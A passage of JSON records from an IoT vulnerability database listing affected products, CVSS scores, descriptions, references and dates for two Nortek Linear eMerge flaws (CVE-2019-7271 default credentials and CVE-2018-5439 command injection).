"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7271"
}
]
},
"cve": "CVE-2019-7271",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7271",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158706",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7271",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7271",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-029",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158706",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7271",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nortek Linear eMerge 50P/5000P devices have Default Credentials. Nortek Linear eMerge 50P/5000P The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. A trust management issue vulnerability exists in Nortek Security \u0026 Control Linear eMerge 50P/5000P. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "VULMON",
"id": "CVE-2019-7271"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7271",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-029",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158706",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7271",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"id": "VAR-201907-0172",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158706"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:28:08.439000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EMERGE 50P/5000P BROWSER MANAGED ACCESS SYSTEMS 4.X",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/products/access-control-systems/emerge-browser-managed-access-systems-2/"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/syrti/poc_to_review "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 1.8,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7271"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7271"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/522.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/syrti/poc_to_review"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158706"
},
{
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-01T00:00:00",
"db": "VULHUB",
"id": "VHN-158706"
},
{
"date": "2019-07-01T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"date": "2019-07-01T21:15:11.233000",
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"date": "2019-07-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158706"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7271"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7271"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nortek Linear eMerge 50P/5000P Vulnerabilities related to certificate and password management in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-029"
}
],
"trust": 0.6
}
}
VAR-201802-1043
Vulnerability from variot - Updated: 2023-12-18 10:50A Command Injection issue was discovered in Nortek Linear eMerge E3 series Versions V0.32-07e and prior. A remote attacker may be able to execute arbitrary code on a target machine with elevated privileges. Nortek Security&Control is a company that provides wireless security, home automation and personal security systems and devices. The platform provides scalable, browser-based access control capabilities
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201802-1043",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "emerge e3",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "0.32-07e"
},
{
"model": "linear emerge e3 series \u003c=v0.32-07e",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge e3",
"scope": "lte",
"trust": 0.8,
"vendor": "nortek",
"version": "0.32-07e"
},
{
"model": "emerge e3",
"scope": "eq",
"trust": 0.6,
"vendor": "nortekcontrol",
"version": "0.32-07e"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "0.32-07e",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:emerge_e3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5439"
}
]
},
"cve": "CVE-2018-5439",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-5439",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-03483",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-135470",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-5439",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5439",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-03483",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201802-814",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-135470",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-5439",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Command Injection issue was discovered in Nortek Linear eMerge E3 series Versions V0.32-07e and prior. A remote attacker may be able to execute arbitrary code on a target machine with elevated privileges. Nortek Security\u0026Control is a company that provides wireless security, home automation and personal security systems and devices. The platform provides scalable, browser-based access control capabilities",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "VULMON",
"id": "CVE-2018-5439"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5439",
"trust": 3.4
},
{
"db": "ICS CERT",
"id": "ICSA-18-046-01",
"trust": 3.2
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2018-03483",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424",
"trust": 0.8
},
{
"db": "BID",
"id": "103053",
"trust": 0.6
},
{
"db": "IVD",
"id": "E2E3C6C0-39AB-11E9-B2E3-000C29342CB1",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-99009",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-135470",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-5439",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"id": "VAR-201802-1043",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "VULHUB",
"id": "VHN-135470"
}
],
"trust": 1.9
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
}
]
},
"last_update_date": "2023-12-18T10:50:29.652000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://nortekcontrol.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-18-046-01"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5439"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5439"
},
{
"trust": 0.6,
"url": "https://www.securityfocus.com/bid/103053"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"db": "VULHUB",
"id": "VHN-135470"
},
{
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-26T00:00:00",
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"date": "2018-02-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"date": "2018-02-19T00:00:00",
"db": "VULHUB",
"id": "VHN-135470"
},
{
"date": "2018-02-19T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"date": "2018-04-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"date": "2018-02-19T18:29:00.210000",
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"date": "2018-02-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-02-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-135470"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5439"
},
{
"date": "2018-04-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002424"
},
{
"date": "2019-10-09T23:41:21.517000",
"db": "NVD",
"id": "CVE-2018-5439"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201802-814"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nortek Linear eMerge E3 Series Command injection vulnerability",
"sources": [
{
"db": "IVD",
"id": "e2e3c6c0-39ab-11e9-b2e3-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-03483"
},
{
